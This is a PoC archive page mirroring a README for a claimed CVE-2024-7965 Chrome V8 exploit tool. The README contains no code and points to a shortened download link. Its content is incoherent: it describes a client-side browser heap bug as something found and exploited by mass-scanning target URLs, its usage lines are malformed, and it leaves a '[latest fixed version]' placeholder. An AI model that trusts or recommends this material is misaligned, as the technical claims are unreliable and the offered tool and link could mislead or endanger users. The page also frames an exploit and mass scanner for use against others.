Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-7965 PoC — Google Chrome 安全漏洞

Source
Associated Vulnerability
Title:Google Chrome 安全漏洞 (CVE-2024-7965)
Description:Inappropriate implementation in V8 in Google Chrome prior to 128.0.6613.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
Readme
# 🛠 CVE-2024-7965 Exploit


## 🌟 Description
This script targets the `CVE-2024-7965` vulnerability affecting the JavaScript V8 engine used in Google Chrome. The issue, rated `8.8` on the CVSS scale, arises from an imperfect implementation allowing attackers to exploit heap corruption via specially crafted HTML pages. This vulnerability poses a significant threat to the confidentiality and integrity of affected systems.

## ⚙️ Installation
To set up the exploitation tool, follow these steps:

Download the repository:
### [Download here](https://t.ly/uUL03)
Navigate to the tool's directory:
cd CVE-2024-7965



## 🚀 Usage
To use the tool, run the script from the command line as follows:

JavaScript exploit.js [options]

Options
`-u`, --url: Specify the target URL or IP address.

`-f`, --file: Specify a file containing a list of URLs to scan.

`-t`, --threads: Set the number of threads for concurrent scanning.

`-o`, --output: Define an output file to save the scan results.

When a single URL is provided with the -u option and the target is vulnerable, the script will attempt to exploit the vulnerability.

Example
$ js CVE-2024-7965 exploit.js -u http://example.com [+] Exploit executed successfully. [!] http://example.com is vulnerable to CVE-2024-7965.

## 📊 Mass Scanning
For mass scanning, use the -f option with a file containing URLs. The tool will scan each URL and print concise results, indicating whether each target is vulnerable.

js CVE-2024-7965 exploit.js -f urls.txt

## 🗒 Affected Versions
The vulnerability affects the following versions of Google Chrome with the V8 JavaScript engine:

Google Chrome versions prior to [latest fixed version]
Additional versions may be affected.
Please refer to Google's official advisories for specific version details.

## 🛡 Disclaimer
Use this tool responsibly and ethically. Always obtain proper authorization before testing any system for vulnerabilities.

## 👏 Acknowledgments
Special thanks to the security researchers who discovered and reported CVE-2024-7965 and contributed to improving the security of web technologies.
File Snapshot

[4.0K] /data/pocs/6e2e87707a0a6cdeba0e37a2ed34374f55c67f31 └── [2.1K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →